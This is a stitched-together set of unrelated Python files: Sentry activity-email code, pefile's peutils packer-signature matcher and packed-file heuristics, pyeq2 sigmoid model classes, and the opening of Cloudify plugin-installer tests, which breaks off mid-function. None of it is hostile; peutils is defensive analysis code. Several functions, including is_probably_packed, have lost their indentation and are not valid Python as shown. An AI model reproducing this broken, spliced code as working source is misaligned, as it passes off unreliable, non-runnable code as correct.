        url = reverse('sentry-user-avatar-url', args=[avatar.ident])
        if size:
            url = '{}?s={}'.format(url, int(size))
        return absolute_uri(url)

    def description_as_text(self, description, params):
        user = self.activity.user
        name = (user.name or user.email) if user else u'Sentry'

        context = {
            'author': name,
            'an issue': u'an issue',
        }
        context.update(params)
        return description.format(**context)

    def description_as_html(self, description, params):
        user = self.activity.user
        name = user.get_display_name() if user else 'Sentry'

        fmt = u'<span class="avatar-container">{}</span> <strong>{}</strong>'
        author = mark_safe(fmt.format(
            self.avatar_as_html(),
            escape(name),
        ))
        an_issue = u'<a href="{}">an issue</a>'.format(
            escape(self.get_group_link()),
        )

        context = {
            'author': author,
            'an issue': an_issue,
        }
        context.update(params)
        return mark_safe(description.format(**context))

    def send(self):
        if not self.should_email():
            return

        users = self.get_participants()
        if not users:
            return

        activity = self.activity
        project = self.project
        group = self.group

        context = self.get_base_context()
        context.update(self.get_context())

        subject = (u'{}{}'.format(
            self._get_subject_prefix(),
            self.get_subject(),
        )).encode('utf-8')

        template = self.get_template()
        html_template = self.get_html_template()
        email_type = self.get_email_type()
        headers = self.get_headers()

        for user in users:
            if group:
                # Per-recipient signed unsubscribe link for this issue.
                context['unsubscribe_link'] = generate_signed_link(
                    user.id,
                    'sentry-account-email-unsubscribe-issue',
                    kwargs={'issue_id': group.id},
                )

            msg = MessageBuilder(
                subject=subject,
                template=template,
                html_template=html_template,
                headers=headers,
                type=email_type,
                context=context,
                reference=activity,
                reply_reference=group,
            )
            msg.add_users([user.id], project=project)
            msg.send_async()
|
|
# -*- coding: Latin-1 -*-
"""peutils, Portable Executable utilities module
Copyright (c) 2005-2013 Ero Carrera <ero.carrera@gmail.com>
All rights reserved.
For detailed copyright information see the file COPYING in
the root of the distribution archive.
"""
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from past.utils import old_div
from builtins import object
import os
import re
import string
import urllib.request, urllib.parse, urllib.error
import pefile
__author__ = 'Ero Carrera'
__version__ = pefile.__version__
__contact__ = 'ero.carrera@gmail.com'
class SignatureDatabase(object):
    """This class loads and keeps a parsed PEiD signature database.

    Usage:

        sig_db = SignatureDatabase('/path/to/signature/file')

    and/or

        sig_db = SignatureDatabase()
        sig_db.load('/path/to/signature/file')

    Signature databases can be combined by performing multiple loads.

    The filename parameter can be a URL too. In that case the
    signature database will be downloaded from that location.
    """

    def __init__(self, filename=None, data=None):
        # RegExp to match a signature block
        #
        self.parse_sig = re.compile(
            '\[(.*?)\]\s+?signature\s*=\s*(.*?)(\s+\?\?)*\s*ep_only\s*=\s*(\w+)(?:\s*section_start_only\s*=\s*(\w+)|)', re.S)

        # Signature information
        #
        # Signatures are stored as trees using dictionaries
        # The keys are the byte values while the values for
        # each key are either:
        #
        # - Other dictionaries of the same form for further
        #   bytes in the signature
        #
        # - A dictionary with a string as a key (packer name)
        #   and None as value to indicate a full signature
        #
        self.signature_tree_eponly_true = dict ()
        self.signature_count_eponly_true = 0
        self.signature_tree_eponly_false = dict ()
        self.signature_count_eponly_false = 0
        self.signature_tree_section_start = dict ()
        self.signature_count_section_start = 0

        # The depth (length) of the longest signature
        #
        self.max_depth = 0

        self.__load(filename=filename, data=data)

    def generate_section_signatures(self, pe, name, sig_length=512):
        """Generates signatures for all the sections in a PE file.

        If the section contains any data a signature will be created
        for it. The signature name will be a combination of the
        parameter 'name' and the section number and its name.

        Returns all generated signature blocks joined into one string.
        """

        section_signatures = list()

        for idx, section in enumerate(pe.sections):

            # Skip sections too small to produce a full-length signature.
            if section.SizeOfRawData < sig_length:
                continue

            #offset = pe.get_offset_from_rva(section.VirtualAddress)
            offset = section.PointerToRawData

            sig_name = '%s Section(%d/%d,%s)' % (
                name, idx + 1, len(pe.sections),
                ''.join([c for c in section.Name if c in string.printable]))

            section_signatures.append(
                self.__generate_signature(
                    pe, offset, sig_name, ep_only=False,
                    section_start_only=True,
                    sig_length=sig_length) )

        return '\n'.join(section_signatures)+'\n'

    def generate_ep_signature(self, pe, name, sig_length=512):
        """Generate signatures for the entry point of a PE file.

        Creates a signature whose name will be the parameter 'name'
        and the section number and its name.
        """

        offset = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)

        return self.__generate_signature(
            pe, offset, name, ep_only=True, sig_length=sig_length)

    def __generate_signature(self, pe, offset, name, ep_only=False,
                             section_start_only=False, sig_length=512):
        """Format sig_length bytes at `offset` as a PEiD signature block."""

        data = pe.__data__[offset:offset+sig_length]
        signature_bytes = ' '.join(['%02x' % ord(c) for c in data])

        # Render the booleans as the 'true'/'false' strings the PEiD
        # database format expects.
        if ep_only == True:
            ep_only = 'true'
        else:
            ep_only = 'false'

        if section_start_only == True:
            section_start_only = 'true'
        else:
            section_start_only = 'false'

        signature = '[%s]\nsignature = %s\nep_only = %s\nsection_start_only = %s\n' % (
            name, signature_bytes, ep_only, section_start_only)

        return signature

    def match(self, pe, ep_only=True, section_start_only=False):
        """Matches and returns the exact match(es).

        If ep_only is True the result will be a string with
        the packer name. Otherwise it will be a list of the
        form (file_ofsset, packer_name). Specifying where
        in the file the signature was found.
        """

        matches = self.__match(pe, ep_only, section_start_only)

        # The last match (the most precise) from the
        # list of matches (if any) is returned
        #
        if matches:
            if ep_only == False:
                # Get the most exact match for each list of matches
                # at a given offset
                #
                return [(match[0], match[1][-1]) for match in matches]

            return matches[1][-1]

        return None

    def match_all(self, pe, ep_only=True, section_start_only=False):
        """Matches and returns all the likely matches."""

        matches = self.__match(pe, ep_only, section_start_only)

        if matches:

            if ep_only == False:
                # Get the most exact match for each list of matches
                # at a given offset
                #
                return matches

            return matches[1]

        return None

    def __match(self, pe, ep_only, section_start_only):
        """Scan `pe` against the appropriate signature tree.

        Returns a list of (offset, names) matches, or — when ep_only is
        True — just the single (offset, names) tuple for the entry point
        (an empty list when nothing matched).
        """

        # Load the corresponding set of signatures
        # Either the one for ep_only equal to True or
        # to False
        #
        if section_start_only is True:

            # Fetch the data of the executable as it'd
            # look once loaded in memory
            #
            try :
                data = pe.__data__
            except Exception as excp :
                raise

            # Load the corresponding tree of signatures
            #
            signatures = self.signature_tree_section_start

            # Set the starting address to start scanning from
            #
            scan_addresses = [section.PointerToRawData for section in pe.sections]

        elif ep_only is True:

            # Fetch the data of the executable as it'd
            # look once loaded in memory
            #
            try :
                data = pe.get_memory_mapped_image()
            except Exception as excp :
                raise

            # Load the corresponding tree of signatures
            #
            signatures = self.signature_tree_eponly_true

            # Fetch the entry point of the PE file and the data
            # at the entry point
            #
            ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint

            # Set the starting address to start scanning from
            #
            scan_addresses = [ep]

        else:

            # Full-file scan: every byte offset is a candidate start.
            data = pe.__data__
            signatures = self.signature_tree_eponly_false
            scan_addresses = range( len(data) )

        # For each start address, check if any signature matches
        #
        matches = []
        for idx in scan_addresses:
            result = self.__match_signature_tree(
                signatures,
                data[idx:idx+self.max_depth])
            if result:
                matches.append( (idx, result) )

        # Return only the matched items found at the entry point if
        # ep_only is True (matches will have only one element in that
        # case)
        #
        if ep_only is True:
            if matches:
                return matches[0]

        return matches

    def match_data(self, code_data, ep_only=True, section_start_only=False):
        """Scan a raw byte string (instead of a PE object) at offset 0.

        NOTE(review): there is no `else` branch below — calling this with
        ep_only=False and section_start_only=False leaves `signatures`
        unbound and raises NameError. Confirm intended usage before
        relying on that combination.
        """

        data = code_data
        scan_addresses = [ 0 ]

        # Load the corresponding set of signatures
        # Either the one for ep_only equal to True or
        # to False
        #
        if section_start_only is True:

            # Load the corresponding tree of signatures
            #
            signatures = self.signature_tree_section_start

            # Set the starting address to start scanning from
            #

        elif ep_only is True:

            # Load the corresponding tree of signatures
            #
            signatures = self.signature_tree_eponly_true

        # For each start address, check if any signature matches
        #
        matches = []
        for idx in scan_addresses:
            result = self.__match_signature_tree(
                signatures,
                data[idx:idx+self.max_depth])
            if result:
                matches.append( (idx, result) )

        # Return only the matched items found at the entry point if
        # ep_only is True (matches will have only one element in that
        # case)
        #
        if ep_only is True:
            if matches:
                return matches[0]

        return matches

    def __match_signature_tree(self, signature_tree, data, depth = 0):
        """Recursive function to find matches along the signature tree.

        signature_tree  is the part of the tree left to walk
        data            is the data being checked against the signature tree
        depth           keeps track of how far we have gone down the tree

        Returns a list of lists of matching packer names.
        """

        matched_names = list ()
        match = signature_tree

        # Walk the bytes in the data and match them
        # against the signature
        #
        # Bytes may be ints (Python 3 / bytes) or 1-char strings
        # (Python 2); normalize to ints before matching.
        for idx, byte in enumerate ( [b if isinstance(b, int) else ord(b) for b in data] ):

            # If the tree is exhausted...
            #
            if match is None :
                break

            # Get the next byte in the tree
            #
            match_next = match.get(byte, None)

            # If None is among the values for the key
            # it means that a signature in the database
            # ends here and that there's an exact match.
            #
            if None in list(match.values()):
                # idx represent how deep we are in the tree
                #
                #names = [idx+depth]
                names = list()
                # For each of the item pairs we check
                # if it has an element other than None,
                # if not then we have an exact signature
                #
                for item in list(match.items()):
                    if item[1] is None :
                        names.append (item[0])
                matched_names.append(names)

            # If a wildcard is found keep scanning the signature
            # ignoring the byte.
            #
            if '??' in match :
                match_tree_alternate = match.get ('??', None)
                data_remaining = data[idx + 1 :]
                if data_remaining:
                    matched_names.extend(
                        self.__match_signature_tree(
                            match_tree_alternate, data_remaining, idx+depth+1))

            match = match_next

        # If we have any more packer name in the end of the signature tree
        # add them to the matches
        #
        if match is not None and None in list(match.values()):
            #names = [idx + depth + 1]
            names = list()
            for item in list(match.items()) :
                if item[1] is None:
                    names.append(item[0])
            matched_names.append(names)

        return matched_names

    def load(self , filename=None, data=None):
        """Load a PEiD signature file.

        Invoking this method on different files combines the signatures.
        """

        self.__load(filename=filename, data=data)

    def __load(self, filename=None, data=None):
        """Parse signature text (from a path, URL, or raw `data` string)
        and merge each signature into the appropriate prefix tree."""

        if filename is not None:
            # If the path does not exist, attempt to open a URL
            #
            if not os.path.exists(filename):
                try:
                    sig_f = urllib.request.urlopen(filename)
                    sig_data = sig_f.read()
                    sig_f.close()
                except IOError:
                    # Let this be raised back to the user...
                    raise
            else:
                # Get the data for a file
                #
                try:
                    sig_f = open( filename, 'rt' )
                    sig_data = sig_f.read()
                    sig_f.close()
                except IOError:
                    # Let this be raised back to the user...
                    raise
        else:
            sig_data = data

        # If the file/URL could not be read or no "raw" data
        # was provided there's nothing else to do
        #
        if not sig_data:
            return

        # Helper function to parse the signature bytes
        #
        def to_byte(value):
            # Wildcard bytes ('??') are kept as-is; everything else is hex.
            if '?' in value:
                return value
            return int(value, 16)

        # Parse all the signatures in the file
        #
        matches = self.parse_sig.findall(sig_data)

        # For each signature, get the details and load it into the
        # signature tree
        #
        for packer_name, signature, superfluous_wildcards, ep_only, section_start_only in matches:

            ep_only = ep_only.strip().lower()

            signature = signature.replace('\\n', '').strip()

            signature_bytes = [to_byte(b) for b in signature.split()]

            if ep_only == 'true':
                ep_only = True
            else:
                ep_only = False

            if section_start_only == 'true':
                section_start_only = True
            else:
                section_start_only = False

            depth = 0

            # Pick the destination tree and bump its signature counter.
            if section_start_only is True:

                tree = self.signature_tree_section_start
                self.signature_count_section_start += 1

            else:

                if ep_only is True :
                    tree = self.signature_tree_eponly_true
                    self.signature_count_eponly_true += 1
                else :
                    tree = self.signature_tree_eponly_false
                    self.signature_count_eponly_false += 1

            # Walk/extend the tree one byte at a time; the final byte's
            # dict maps the packer name to None (end-of-signature marker).
            for idx, byte in enumerate (signature_bytes) :

                if idx+1 == len(signature_bytes):

                    tree[byte] = tree.get( byte, dict() )
                    tree[byte][packer_name] = None

                else :

                    tree[byte] = tree.get ( byte, dict() )

                    tree = tree[byte]

                depth += 1

            if depth > self.max_depth:
                self.max_depth = depth
def is_valid( pe ):
    """Check whether `pe` is a valid PE file. Not implemented yet;
    currently always returns None."""
    pass
def is_suspicious( pe ):
    """Heuristic checks for signs of obfuscation in a PE file.

    Planned heuristics (see inline notes):
      - unusual locations of import tables
      - non recognized section names
      - presence of long ASCII strings

    Currently only the relocation-based indicators are computed
    (relocations overlapping the entry point, long runs of
    near-sequential relocation RVAs) plus a parser-warning flag.
    The function is incomplete upstream and does not yet return a
    verdict, so callers always receive None.
    """

    relocations_overlap_entry_point = False
    sequential_relocs = 0

    # If relocation data is found and the entries go over the entry point, and also are very
    # continuous or point outside section's boundaries => it might imply that an obfuscation
    # trick is being used or the relocations are corrupt (maybe intentionally)
    #
    if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'):
        for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC:
            last_reloc_rva = None
            for reloc in base_reloc.entries:
                if reloc.rva <= pe.OPTIONAL_HEADER.AddressOfEntryPoint <= reloc.rva + 4:
                    relocations_overlap_entry_point = True

                if last_reloc_rva is not None and last_reloc_rva <= reloc.rva <= last_reloc_rva + 4:
                    sequential_relocs += 1
                last_reloc_rva = reloc.rva

    # If import tables or strings exist (are pointed to) to within the header or in the area
    # between the PE header and the first section that's supicious
    #
    # IMPLEMENT

    warnings_while_parsing = False
    # If we have warnings, that's suspicious, some of those will be because of out-of-ordinary
    # values are found in the PE header fields
    # Things that are reported in warnings:
    # (parsing problems, special section characteristics i.e. W & X, uncommon values of fields,
    # unusual entrypoint, suspicious imports)
    #
    warnings = pe.get_warnings()
    if warnings:
        # BUG FIX: this was a bare expression (`warnings_while_parsing`)
        # that evaluated the name and discarded the result; it must be an
        # assignment for the flag to ever be set.
        warnings_while_parsing = True

    # If there are few or none (should come with a standard "density" of strings/kilobytes of data) longer (>8)
    # ascii sequences that might indicate packed data, (this is similar to the entropy test in some ways but
    # might help to discard cases of legitimate installer or compressed data)

    # If compressed data (high entropy) and is_driver => uuuuhhh, nasty

    pass
def is_probably_packed( pe ):
"""Returns True is there is a high likelihood that a file is packed or contains compressed data.
The sections of the PE file will be analyzed, if enough sections
look like containing containing compressed data and the data makes
up for more than 20% of the total file size. The function will
return True.
"""
# Calculate the lenth of the data up to the end of the last section in the
# file. Overlay data won't be taken into account
#
total_pe_data_length = len( pe.trim() )
has_significant_amount_of_compressed_data = False
# If some of the sections have high entropy and they make for more than 20% of the file's size
# it's assumed that it could be an installer or a packed file
total_compressed_data = 0
for section in pe.sections:
s_entropy = section.get_entropy()
s_length = len( section.get_data() )
# The value of 7.4 is empircal, based of looking at a few files packed
# by different packers
if s_entropy > 7.4:
total_compressed_data += s_length
if (old_div((1.0 * total_compressed_data),total_pe_data_length)) > .2:
has_significant_amount_of_compressed_data = True
return has_significant_amount_of_compressed_data
|
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
# pyeq2 is a collection of equations expressed as Python classes
#
# Copyright (C) 2013 James R. Phillips
# 2548 Vera Cruz Drive
# Birmingham, AL 35235 USA
#
# email: zunzun@zunzun.com
#
# License: BSD-style (see LICENSE.txt in main source directory)
import sys, os
if os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '..') not in sys.path:
sys.path.append(os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '..'))
import pyeq2
import numpy
numpy.seterr(all= 'ignore')
import pyeq2.Model_3D_BaseClass
class AndreaPrunottoSigmoidA(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
    """3D model: z = a0 + a1 / (1 + exp(a2 * (x + a3 + a4*y + a5*x*y)))."""

    _baseName = "Andrea Prunotto Sigmoid A"
    _HTML = 'z = a0 + (a1 / (1.0 + exp(a2 * (x + a3 + a4 * y + a5 * x * y))))'
    _leftSideHTML = 'z'
    _coefficientDesignators = ['a0', 'a1', 'a2', 'a3', 'a4', 'a5']
    _canLinearSolverBeUsedForSSQABS = False

    webReferenceURL = ''

    baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False
    autoGenerateOffsetForm = False
    autoGenerateReciprocalForm = True
    autoGenerateInverseForms = True
    autoGenerateGrowthAndDecayForms = True

    independentData1CannotContainZeroFlag = False
    independentData1CannotContainPositiveFlag = False
    independentData1CannotContainNegativeFlag = False
    independentData2CannotContainZeroFlag = False
    independentData2CannotContainPositiveFlag = False
    independentData2CannotContainNegativeFlag = False

    def GetDataCacheFunctions(self):
        """Declare the cached data series (X, Y, XY product) this model needs."""
        functionList = []
        functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.XY(NameOrValueFlag=1), []])
        return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)

    def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
        """Evaluate the model for every cached data point.

        On any numeric failure, 1.0E300 is returned for each point so the
        fitter steers away from this coefficient set.
        """
        # only need to perform these dictionary look-ups once
        x_in = inDataCacheDictionary['X']
        y_in = inDataCacheDictionary['Y']

        a0 = inCoeffs[0]
        a1 = inCoeffs[1]
        a2 = inCoeffs[2]
        a3 = inCoeffs[3]
        a4 = inCoeffs[4]
        a5 = inCoeffs[5]

        try:
            temp = a0 + (a1 / (1.0 + numpy.exp(a2 * (x_in + a3 + a4 * y_in + a5 * x_in * y_in))))
            return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
        except Exception:
            # BUG FIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt and SystemExit.
            return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300

    def SpecificCodeCPP(self):
        """Return the C++ statement that computes this model's prediction."""
        s = "\ttemp = a0 + (a1 / (1.0 + exp(a2 * (x_in + a3 + a4 * y_in + a5 * x_in * y_in))));\n"
        return s
class AndreaPrunottoSigmoidB(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
    """3D model: z = a0 + a1 / (1 + exp(a2 * (x*a3 + a4*y + a5*x*y)))."""

    _baseName = "Andrea Prunotto Sigmoid B"
    _HTML = 'z = a0 + (a1 / (1.0 + exp(a2 * (x * a3 + a4 * y + a5 * x * y))))'
    _leftSideHTML = 'z'
    _coefficientDesignators = ['a0', 'a1', 'a2', 'a3', 'a4', 'a5']
    _canLinearSolverBeUsedForSSQABS = False

    webReferenceURL = ''

    baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False
    autoGenerateOffsetForm = False
    autoGenerateReciprocalForm = True
    autoGenerateInverseForms = True
    autoGenerateGrowthAndDecayForms = True

    independentData1CannotContainZeroFlag = False
    independentData1CannotContainPositiveFlag = False
    independentData1CannotContainNegativeFlag = False
    independentData2CannotContainZeroFlag = False
    independentData2CannotContainPositiveFlag = False
    independentData2CannotContainNegativeFlag = False

    def GetDataCacheFunctions(self):
        """Declare the cached data series (X, Y, XY product) this model needs."""
        functionList = []
        functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.XY(NameOrValueFlag=1), []])
        return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)

    def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
        """Evaluate the model for every cached data point.

        On any numeric failure, 1.0E300 is returned for each point so the
        fitter steers away from this coefficient set.
        """
        # only need to perform these dictionary look-ups once
        x_in = inDataCacheDictionary['X']
        y_in = inDataCacheDictionary['Y']

        a0 = inCoeffs[0]
        a1 = inCoeffs[1]
        a2 = inCoeffs[2]
        a3 = inCoeffs[3]
        a4 = inCoeffs[4]
        a5 = inCoeffs[5]

        try:
            temp = a0 + (a1 / (1.0 + numpy.exp(a2 * (x_in * a3 + a4 * y_in + a5 * x_in * y_in))))
            return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
        except Exception:
            # BUG FIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt and SystemExit.
            return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300

    def SpecificCodeCPP(self):
        """Return the C++ statement that computes this model's prediction."""
        s = "\ttemp = a0 + (a1 / (1.0 + exp(a2 * (x_in * a3 + a4 * y_in + a5 * x_in * y_in))));\n"
        return s
class FraserSmithSigmoid(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
    """3D model: z = 1 / ((1 + exp(a - b*x)) * (1 + exp(c - d*y)))."""

    _baseName = "Fraser Smith Sigmoid"
    _HTML = 'z = 1.0 / ((1.0 + exp(a - bx)) * (1.0 + e(c - dy)))'
    _leftSideHTML = 'z'
    _coefficientDesignators = ['a', 'b', 'c', 'd']
    _canLinearSolverBeUsedForSSQABS = False

    webReferenceURL = ''

    baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False
    autoGenerateOffsetForm = True
    autoGenerateReciprocalForm = False
    autoGenerateInverseForms = True
    autoGenerateGrowthAndDecayForms = True

    independentData1CannotContainZeroFlag = False
    independentData1CannotContainPositiveFlag = False
    independentData1CannotContainNegativeFlag = False
    independentData2CannotContainZeroFlag = False
    independentData2CannotContainPositiveFlag = False
    independentData2CannotContainNegativeFlag = False

    def GetDataCacheFunctions(self):
        """Declare the cached data series (X and Y) this model needs."""
        functionList = []
        functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
        return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)

    def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
        """Evaluate the model for every cached data point.

        On any numeric failure, 1.0E300 is returned for each point so the
        fitter steers away from this coefficient set.
        """
        # only need to perform these dictionary look-ups once
        x_in = inDataCacheDictionary['X']
        y_in = inDataCacheDictionary['Y']

        a = inCoeffs[0]
        b = inCoeffs[1]
        c = inCoeffs[2]
        d = inCoeffs[3]

        try:
            temp = 1.0 / ((1.0 + numpy.exp(a - b * x_in)) * (1.0 + numpy.exp(c - d * y_in)))
            return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
        except Exception:
            # BUG FIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt and SystemExit.
            return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300

    def SpecificCodeCPP(self):
        """Return the C++ statement that computes this model's prediction."""
        s = "\ttemp = 1.0 / ((1.0 + exp(a - b * x_in)) * (1.0 + exp(c - d * y_in)));\n"
        return s
class FraserSmithSigmoid_scaled(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
    """3D model: z = Scale / ((1 + exp(a - b*x)) * (1 + exp(c - d*y)))."""

    _baseName = "Fraser Smith Sigmoid Scaled"
    _HTML = 'z = Scale / ((1.0 + exp(a - bx)) * (1.0 + e(c - dy)))'
    _leftSideHTML = 'z'
    _coefficientDesignators = ['a', 'b', 'c', 'd', 'Scale']
    _canLinearSolverBeUsedForSSQABS = False

    webReferenceURL = ''

    baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True
    autoGenerateOffsetForm = True
    autoGenerateReciprocalForm = False
    autoGenerateInverseForms = True
    autoGenerateGrowthAndDecayForms = True

    independentData1CannotContainZeroFlag = False
    independentData1CannotContainPositiveFlag = False
    independentData1CannotContainNegativeFlag = False
    independentData2CannotContainZeroFlag = False
    independentData2CannotContainPositiveFlag = False
    independentData2CannotContainNegativeFlag = False

    def GetDataCacheFunctions(self):
        """Declare the cached data series (X and Y) this model needs."""
        functionList = []
        functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
        return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)

    def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
        """Evaluate the model for every cached data point.

        On any numeric failure, 1.0E300 is returned for each point so the
        fitter steers away from this coefficient set.
        """
        # only need to perform these dictionary look-ups once
        x_in = inDataCacheDictionary['X']
        y_in = inDataCacheDictionary['Y']

        a = inCoeffs[0]
        b = inCoeffs[1]
        c = inCoeffs[2]
        d = inCoeffs[3]
        scale = inCoeffs[4]

        try:
            temp = scale / ((1.0 + numpy.exp(a - b * x_in)) * (1.0 + numpy.exp(c - d * y_in)))
            return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
        except Exception:
            # BUG FIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt and SystemExit.
            return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300

    def SpecificCodeCPP(self):
        """Return the C++ statement that computes this model's prediction."""
        s = "\ttemp = Scale / ((1.0 + exp(a - b * x_in)) * (1.0 + exp(c - d * y_in)));\n"
        return s
class Sigmoid(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
    """3D model: z = a / ((1 + exp(b - c*x)) * (1 + exp(d - f*y)))."""

    _baseName = "Sigmoid"
    _HTML = 'z = a / ((1.0 + exp(b - cx)) * (1.0 + exp(d - fy)))'
    _leftSideHTML = 'z'
    _coefficientDesignators = ['a', 'b', 'c', 'd', 'f']
    _canLinearSolverBeUsedForSSQABS = False

    webReferenceURL = ''

    baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True
    autoGenerateOffsetForm = True
    autoGenerateReciprocalForm = True
    autoGenerateInverseForms = True
    autoGenerateGrowthAndDecayForms = True

    independentData1CannotContainZeroFlag = False
    independentData1CannotContainPositiveFlag = False
    independentData1CannotContainNegativeFlag = False
    independentData2CannotContainZeroFlag = False
    independentData2CannotContainPositiveFlag = False
    independentData2CannotContainNegativeFlag = False

    def GetDataCacheFunctions(self):
        """Declare the cached data series (X and Y) this model needs."""
        functionList = []
        functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
        functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
        return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)

    def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
        """Evaluate the model for every cached data point.

        On any numeric failure, 1.0E300 is returned for each point so the
        fitter steers away from this coefficient set.
        """
        # only need to perform these dictionary look-ups once
        x_in = inDataCacheDictionary['X']
        y_in = inDataCacheDictionary['Y']

        a = inCoeffs[0]
        b = inCoeffs[1]
        c = inCoeffs[2]
        d = inCoeffs[3]
        f = inCoeffs[4]

        try:
            temp = a / ((1.0 + numpy.exp(b - c * x_in)) * (1.0 + numpy.exp(d - f * y_in)))
            return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
        except Exception:
            # BUG FIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt and SystemExit.
            return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300

    def SpecificCodeCPP(self):
        """Return the C++ statement that computes this model's prediction."""
        s = "\ttemp = a / ((1.0 + exp(b - c * x_in)) * (1.0 + exp(d - f * y_in)));\n"
        return s
|
|
########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
from os.path import dirname
import tempfile
import shutil
import tarfile
import filecmp
import testtools
from cloudify.exceptions import NonRecoverableError
from cloudify.mocks import MockCloudifyContext
from cloudify.utils import LocalCommandRunner
from cloudify.utils import setup_logger
from plugin_installer.tasks import install, get_url_and_args, \
update_includes, parse_pip_version, \
is_pip6_or_higher, extract_plugin_dir
from cloudify.constants import CELERY_WORK_DIR_PATH_KEY
from cloudify.constants import VIRTUALENV_PATH_KEY
from cloudify.constants import LOCAL_IP_KEY
from cloudify.constants import MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL_KEY
from plugin_installer.tests.file_server import FileServer
from plugin_installer.tests.file_server import PORT
logger = setup_logger('test_plugin_installer')
runner = LocalCommandRunner()
test_file_server = FileServer(dirname(__file__))
MOCK_PLUGIN = 'mock-plugin'
MOCK_PLUGIN_WITH_DEPENDENCIES = 'mock-with-dependencies-plugin'
MOCK_PLUGIN_WITH_INSTALL_ARGS = 'mock-with-install-args-plugin'
ZIP_SUFFIX = 'zip'
TAR_SUFFIX = 'tar'
TEST_BLUEPRINT_ID = 'mock_blueprint_id'
PLUGINS_DIR = '{0}/plugins'.format(TEST_BLUEPRINT_ID)
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL = 'http://localhost:{0}' \
.format(PORT)
def _get_local_path(ctx, plugin):
return os.path.join(dirname(__file__),
plugin['source'])
class PluginInstallerTestCase(testtools.TestCase):
    """Integration tests for the plugin installer tasks.

    A local HTTP file server (started once per class) serves tar'ed mock
    plugins the way the manager's blueprint file server would, and each test
    installs into a throw-away virtualenv created in setUp().
    """

    @classmethod
    def setUpClass(cls):
        # install virtual env. this ensures the env that will be later created
        # will use the python env the test is running in (e.g. might be 2.6)
        runner.run('pip install virtualenv')

        # create tar files for the mock plugins used by the tests
        cls.create_plugin_tar(MOCK_PLUGIN)
        cls.create_plugin_tar(MOCK_PLUGIN_WITH_DEPENDENCIES)
        cls.create_plugin_tar(MOCK_PLUGIN_WITH_INSTALL_ARGS)

        try:
            # start file server
            test_file_server.start()
        except Exception as e:
            # BUG FIX: Exception has no ``message`` attribute on Python 3;
            # str(e) is the portable spelling.
            logger.info('Failed to start local file server, '
                        'reported error: {0}'.format(str(e)))
            if test_file_server:
                try:
                    test_file_server.stop()
